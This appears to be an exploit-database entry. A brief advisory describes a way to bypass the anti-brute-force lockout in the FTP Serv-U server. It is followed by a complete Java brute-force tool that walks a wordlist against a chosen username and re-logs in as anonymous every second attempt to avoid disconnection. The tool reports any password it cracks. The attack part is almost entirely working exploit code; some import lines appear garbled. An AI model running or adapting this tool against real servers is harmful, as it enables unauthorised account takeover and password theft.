source: FTP Serv-U is an internet FTP server from CatSoft. FTP Serv-U contains an anti brute-force security feature which does not indicate whether an account is valid or not, after three unsuccessful login attempts a user is disconnected. Reconnection is not permitted until after a specified amount of time. It is possible for a remote user to bypass the anti brute-force function within FTP Serv-U. Once successfully logged into the server either anonymously or with a valid account, a user can from that point brute force other usernames and passwords without ever being disconnected. This could lead to a compromise of other user accounts on the ftp server. import*; import*; import java.util.*; public class newftpbrute { static boolean cancel=false; static boolean found=false; static String File; static String User; static String line=""; static String FTPPass; static String Server=""; static int Counter; static int tries; static BufferedReader quelle; static DataInputStream sin; static PrintStream sout; static Socket s = null; void getdata() { try { System.out.print("FTP-Server>"); DataInputStream in = new DataInputStream (; Server=in.readLine(); System.out.print("Username>"); in = new DataInputStream (; User=in.readLine(); System.out.print("Wordlist>"); in = new DataInputStream (; File=in.readLine(); System.out.print("\n"); try { quelle=new BufferedReader(new FileReader(File)); } catch (FileNotFoundException FNF){}; } catch (IOException e){} }//getdata() void connect() { try { s = new Socket(Server, 21); sin = new DataInputStream (s.getInputStream()); sout = new PrintStream (s.getOutputStream()); } catch (IOException e){} } void CheckForAnonymous() { try { boolean NoAno=false; sout.println("USER anonymous"); if ((line=sin.readLine()).indexOf("331")==-1) NoAno=true; while (true) { if (line.indexOf("220")>-1)line=sin.readLine(); else break; } sout.println("pass"); if ((line=sin.readLine()).indexOf("230 ")>-1) { System.out.println("Anonymous access allowed..."); NoAno=false; } else NoAno=true; if (NoAno) { System.out.println("Anonymous Access not allowed...quitting!"); System.exit(0); } }//try catch (IOException e) { System.out.println("Error Connecting:"+e+" quitting..."); System.exit(0); } }//CheckForAnonymous public static void main(String[] args) { System.out.println("NEW type of FTP brute force\nCoded by Craig from [ H a Q u a r t e r ]\nHTTP://www.HaQuarter.De\n"); newftpbrute now=new newftpbrute(); now.getdata(); now.connect(); try { if ((line=sin.readLine()).indexOf("220")==-1) { System.out.println("Error...ftp server sends unexpected input"); cancel=true; } now.CheckForAnonymous(); while (cancel==false && ((FTPPass=quelle.readLine())!=null)) { Counter++; tries++; System.out.println("#"+tries+" "+FTPPass); sout.println("USER "+User); if ((line=sin.readLine()).indexOf("331 ")==-1) { System.out.println("Error: username not accepted...quitting "); System.exit(0); } sout.println("PASS "+FTPPass); if ((line=sin.readLine()).indexOf("230 ")>-1) { found=true; break; } if (Counter%2==0) { System.out.println("-"); sout.println("user anonymous"); line=sin.readLine(); sout.println("pass"); line=sin.readLine(); Counter=0; } }//while if (found==true) System.out.println("\nAccount was cracked after "+tries+" tries. Password for user "+User+" is \""+FTPPass+"\"\n"); }//try catch (IOException e){} }//main }//class